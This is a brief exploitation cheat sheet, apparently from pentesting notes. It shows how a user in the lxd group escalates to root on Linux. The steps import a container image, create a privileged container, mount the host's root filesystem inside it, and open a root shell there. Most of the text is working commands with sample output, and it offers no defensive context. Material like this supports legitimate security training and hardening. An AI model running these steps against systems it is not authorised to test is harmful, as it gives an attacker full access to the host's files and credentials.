LXD/LXC

LXD - Linux Daemon LXC - Linux Containers

Pre-Requisites

• must be a member of lxd group

Sample Exploitation

1. Check the id command

   $ id
   
   uid=1000(container-user) gid=1000(container-user) groups=1000(container-user),116(lxd)

2. From here on, there are now several ways in which we can exploit LXC/LXD. We can either create our own container and transfer it to the target system or use an existing container.

   $ cd ContainerImages
   $ ls
   
   ubuntu-template.tar.xz

3. Assuming that there is no security (passwords etc), we import the container as an image

   $ lxc image import ubuntu-template.tar.xz --alias ubuntutemp
   $ lxc image list
   
   +-------------------------------------+--------------+--------+-----------------------------------------+--------------+-----------------+-----------+-------------------------------+
   |                ALIAS                | FINGERPRINT  | PUBLIC |               DESCRIPTION               | ARCHITECTURE |      TYPE       |   SIZE    |          UPLOAD DATE          |
   +-------------------------------------+--------------+--------+-----------------------------------------+--------------+-----------------+-----------+-------------------------------+
   | ubuntu/18.04 (v1.1.2)               | 623c9f0bde47 | no    | Ubuntu bionic amd64 (20221024_11:49)     | x86_64       | CONTAINER       | 106.49MB  | Oct 24, 2022 at 12:00am (UTC) |
   +-------------------------------------+--------------+--------+-----------------------------------------+--------------+-----------------+-----------+-------------------------------+

4. Enable the security.privileges flag

   $ lxc init ubuntutemp privesc -c security.privileged=true
   $ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

5. Start the container and log in to it

   $ lxc start privesc
   $ lxc exec privesc /bin/bash
   # ls -l /mnt/root